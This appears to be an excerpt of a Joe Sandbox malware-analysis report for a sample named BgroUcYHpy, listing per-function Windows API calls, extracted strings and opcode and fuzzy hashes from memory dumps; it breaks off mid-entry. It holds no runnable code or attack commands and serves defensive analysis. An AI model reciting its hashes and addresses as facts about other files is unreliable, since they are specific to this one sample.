Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 2fac4f90ba74fdbf861c2cfed2501d9d38b4d5626ba319034da2c4fc442c5210
Instruction ID: fa9afd78785369da5628b19428cfd5c459d7e019a62d05a1260c6e76ba9ac18f
Opcode Fuzzy Hash: 2fac4f90ba74fdbf861c2cfed2501d9d38b4d5626ba319034da2c4fc442c5210
Instruction Fuzzy Hash: 31412871531206EFDB24EF34D946E7A73E8FF05300F2444BEE949D7281EA75A9658B10

Function 002D7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D716A
CreateMenu.USER32 ref: 002D7185
SetMenu.USER32(?,00000000), ref: 002D7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7221
IsMenu.USER32(?), ref: 002D7237
CreatePopupMenu.USER32 ref: 002D7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D726E
DrawMenuBar.USER32 ref: 002D7276

Strings

0, xrefs: 002D7160
F, xrefs: 002D7262

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
Instruction ID: 15358dc03787ce5b4745dab97e8aeefdc6b167a86233b3895cd3efbf2e682304
Opcode Fuzzy Hash: 07af6eb103450e1e86ca4ec39b182bd9c8f0390114f1fd71c76d4d25d346702a
Instruction Fuzzy Hash: 1E414774A11205EFDB20DF64E988E9A7BB5FF49310F14402AFD0697360E735AD20CB90

Function 002D74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002D755E
CreateCompatibleDC.GDI32(00000000), ref: 002D7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002D7578
SelectObject.GDI32(00000000,00000000), ref: 002D7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 002D758B
DeleteDC.GDI32(00000000), ref: 002D7594
GetWindowLongW.USER32(?,000000EC), ref: 002D759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002D75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D75BE

Strings

static, xrefs: 002D74F6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
Instruction ID: 01c75a29b9b19090d2a78609e649714c5a9329cf97b569b14cf7d20a62ff86cd
Opcode Fuzzy Hash: 3a536a8d64e98bfa4419d465d373fad99cac806f999d2d65dcaa0bf095e2143e
Instruction Fuzzy Hash: 0D318D72515215BBDF129F64EC08FDA3B69FF09321F114226FA16A22A0D735DC21DBA8

Function 00276E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00276E3E

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

__gmtime64_s.LIBCMT ref: 00276ED7
__gmtime64_s.LIBCMT ref: 00276F0D
__gmtime64_s.LIBCMT ref: 00276F2A
__allrem.LIBCMT ref: 00276F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276F9C
__allrem.LIBCMT ref: 00276FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00276FD1
__allrem.LIBCMT ref: 00276FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277006
__invoke_watson.LIBCMT ref: 00277077

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 4a99907ff3a3dc5454d7736ff5cf0a9f7dd36d14e3ee2999a387ce59156bdb3c
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: D3710676A21B17ABD714EE78DC45B6BB3A8AF04724F14C229F518E76C1E770DD208B90

Function 002B2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2542
GetMenuItemInfoW.USER32(00315890,000000FF,00000000,00000030), ref: 002B25A3
SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B25D9
Sleep.KERNEL32(000001F4), ref: 002B25EB
GetMenuItemCount.USER32(?), ref: 002B262F
GetMenuItemID.USER32(?,00000000), ref: 002B264B
GetMenuItemID.USER32(?,-00000001), ref: 002B2675
GetMenuItemID.USER32(?,?), ref: 002B26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2735

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
Instruction ID: c6dd401a2c7bc5dc61a1e4a49c21e8cab8e300d8279005eba4dde769f0b84d88
Opcode Fuzzy Hash: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
Instruction Fuzzy Hash: 0461AD7092034AEFDB21CF64DD88DEEBBBCEB45384F544459E842A3251DB31AD29DB21

Function 002D6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D6FA8
GetWindowLongW.USER32(?,000000F0), ref: 002D6FCC
_memset.LIBCMT ref: 002D6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D7067

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
Instruction ID: 1f2463ad3099a1d727fdaaea1e04157505f21785684a909d48f7eae7ed8d9b32
Opcode Fuzzy Hash: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
Instruction Fuzzy Hash: B9617975A10209EFDB11DFA8CC81EEE77B8AB08710F10419AFA15AB3A1D775AD51CB90

Function 002A6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 002A6C18
VariantInit.OLEAUT32(?), ref: 002A6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 002A6C4A
VariantCopy.OLEAUT32(?,?), ref: 002A6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 002A6CB1
VariantClear.OLEAUT32(?), ref: 002A6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 002A6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CDC
VariantClear.OLEAUT32(?), ref: 002A6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CF9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
Instruction ID: 034b52d52ef777b15aac4fcb66325e40911456296e73527ea1af2c547c75cf76
Opcode Fuzzy Hash: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
Instruction Fuzzy Hash: D1415F31E102199FCB00DF64D94C9AEBBB9EF09354F04806AE956A7261CB30AD55CFA4

Function 002C5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002C5793
inet_addr.WSOCK32(?,?,?), ref: 002C57D8
gethostbyname.WSOCK32(?), ref: 002C57E4
IcmpCreateFile.IPHLPAPI ref: 002C57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C58ED
WSACleanup.WSOCK32 ref: 002C58F3

Strings

Ping, xrefs: 002C5816

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 35b09c9a327bcc7794b378b2cd70aa897c4d48c25cfdaa385d4212a09ffafc75
Instruction ID: b9b970345fa6d102fced542fbec752845307903c827d7ee48b94925c78bf0302
Opcode Fuzzy Hash: 35b09c9a327bcc7794b378b2cd70aa897c4d48c25cfdaa385d4212a09ffafc75
Instruction Fuzzy Hash: 08517C31620A119FDB10DF24DC49F2AB7E4AF48720F04862AF956DB2A1DB70EC94CF45

Function 002BB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BB546
GetLastError.KERNEL32 ref: 002BB550
SetErrorMode.KERNEL32(00000000,READY), ref: 002BB5BD

Strings

READONLY, xrefs: 002BB588
NOTREADY, xrefs: 002BB57C
READY, xrefs: 002BB596
INVALID, xrefs: 002BB58F
UNKNOWN, xrefs: 002BB575

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
Instruction ID: bae1e64afe9e9ae3df93fc367e6fb664f90d4cc6a20e57419541fe905cf83b00
Opcode Fuzzy Hash: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
Instruction Fuzzy Hash: 4431D435A20206DFCB22EF68CC45EFDB7B4FF08341F544026E90597291DBB09A56CB52

Function 002A8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A9014
GetDlgCtrlID.USER32 ref: 002A901F
GetParent.USER32 ref: 002A903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 002A903E
GetDlgCtrlID.USER32(?), ref: 002A9047
GetParent.USER32(?), ref: 002A9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9066

Strings

ComboBox, xrefs: 002A8F9C
ListBox, xrefs: 002A8FD1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a47f1d65c439b00f14ba29489eb95ed1faf072071e33382a239b3c9714b410d4
Instruction ID: 1c23d67eb944b45c98454b5cf69a72ce300e35c77a76dd775fad815c62e27400
Opcode Fuzzy Hash: a47f1d65c439b00f14ba29489eb95ed1faf072071e33382a239b3c9714b410d4
Instruction Fuzzy Hash: 4221E570E11104BBDF01ABA0CC99EFEB778EF49310F004116B922972E1DF759869DE64

Function 002A907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A90FD
GetDlgCtrlID.USER32 ref: 002A9108
GetParent.USER32 ref: 002A9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9127
GetDlgCtrlID.USER32(?), ref: 002A9130
GetParent.USER32(?), ref: 002A914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 002A914F

Strings

ComboBox, xrefs: 002A9087
ListBox, xrefs: 002A90BC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 22422580f75da77b41d6f089e07a185f19cc72122e7c1d450cccbc3949a2a2d1
Instruction ID: cf7280736f004eb3e74c9a6f2703d0360b7fbf8a44c8abad6cf90e34b2dc32b4
Opcode Fuzzy Hash: 22422580f75da77b41d6f089e07a185f19cc72122e7c1d450cccbc3949a2a2d1
Instruction Fuzzy Hash: 4321D674E11105BBDF01ABA1DC89EFEBB78EF49300F004016F921972E1DB759869DE64

Function 002A9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002A916F
GetClassNameW.USER32(00000000,?,00000100), ref: 002A9184
_wcscmp.LIBCMT ref: 002A9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A9211

Strings

details, xrefs: 002A91BF
list, xrefs: 002A91F3
SHELLDLL_DefView, xrefs: 002A9190
smallicons, xrefs: 002A91D9
largeicons, xrefs: 002A91A5

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b775529d3e114575e7ccbb0f49b9501f0e4f51985cfd8e0b60f37abfd5cc2bf8
Instruction ID: 4af56f06bf6a9b6575253ee10223efe1b9b1779a20bd3a55517252fa567fe817
Opcode Fuzzy Hash: b775529d3e114575e7ccbb0f49b9501f0e4f51985cfd8e0b60f37abfd5cc2bf8
Instruction Fuzzy Hash: FD113636668307BBFA112A25EC1AEE7379C9B06320F200026FD04E04D5FFA17CB55D94

Function 002B7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002B7A6C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 24d75e23166be5686bfcd28930d50cb260d42a973c7ea8ffe40618a9b430fa59
Instruction ID: 4dcefd608c71b7035e891d65d1e912b00dcc0b2ee5181d3b5267840788664752
Opcode Fuzzy Hash: 24d75e23166be5686bfcd28930d50cb260d42a973c7ea8ffe40618a9b430fa59
Instruction Fuzzy Hash: AEB19F7192421A9FDB10DFA4C884BFEBBB4EF89361F20442AEA41E7241D774E951CF90

Function 002B11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002B11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B1204
GetWindowThreadProcessId.USER32(00000000), ref: 002B120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 002B122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12BC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 493b1c6b295aa1dc9edfccb2f5f3843c4e5ee577e4c78e807c7338cdfe7ebff5
Instruction ID: e0aae012f56792a6a1eef0f2469afa7c260b54cd5ad3ed41b730bdf43a3ddbd2
Opcode Fuzzy Hash: 493b1c6b295aa1dc9edfccb2f5f3843c4e5ee577e4c78e807c7338cdfe7ebff5
Instruction Fuzzy Hash: F2310475A11215FFDB119FA4FD59FEA37AEEB58391F508126FC01C61A0D3B09E608B60

Function 0025FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025FAA6
OleUninitialize.OLE32(?,00000000), ref: 0025FB45
UnregisterHotKey.USER32(?), ref: 0025FC9C
DestroyWindow.USER32(?), ref: 002945D6
FreeLibrary.KERNEL32(?), ref: 0029463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00294668

Strings

close all, xrefs: 0025FAA1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 6bf51f2f4fcfb58216ffd4bb5d1dd8b3d1e718b4f00ac42cee6b50f9dfa19171
Instruction ID: c9527202852aa9e5f40b24077d6771cea9b5dcd693d713ba8613c8bf1ddb37c5
Opcode Fuzzy Hash: 6bf51f2f4fcfb58216ffd4bb5d1dd8b3d1e718b4f00ac42cee6b50f9dfa19171
Instruction Fuzzy Hash: 8DA16C70721212CFCB59EF14C695E69F368AF05701F5442ADEC0AAB261DB30AD7ACF94

Function 002C9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002C9167
VariantInit.OLEAUT32(?), ref: 002C9238
VariantInit.OLEAUT32(?), ref: 002C9339
VariantClear.OLEAUT32(?), ref: 002C9343
VariantClear.OLEAUT32(?), ref: 002C93A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 002C931C
Null Object assignment in FOR..IN loop, xrefs: 002C91C8, 002C92F6, 002C93AE
,,., xrefs: 002C91E5

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
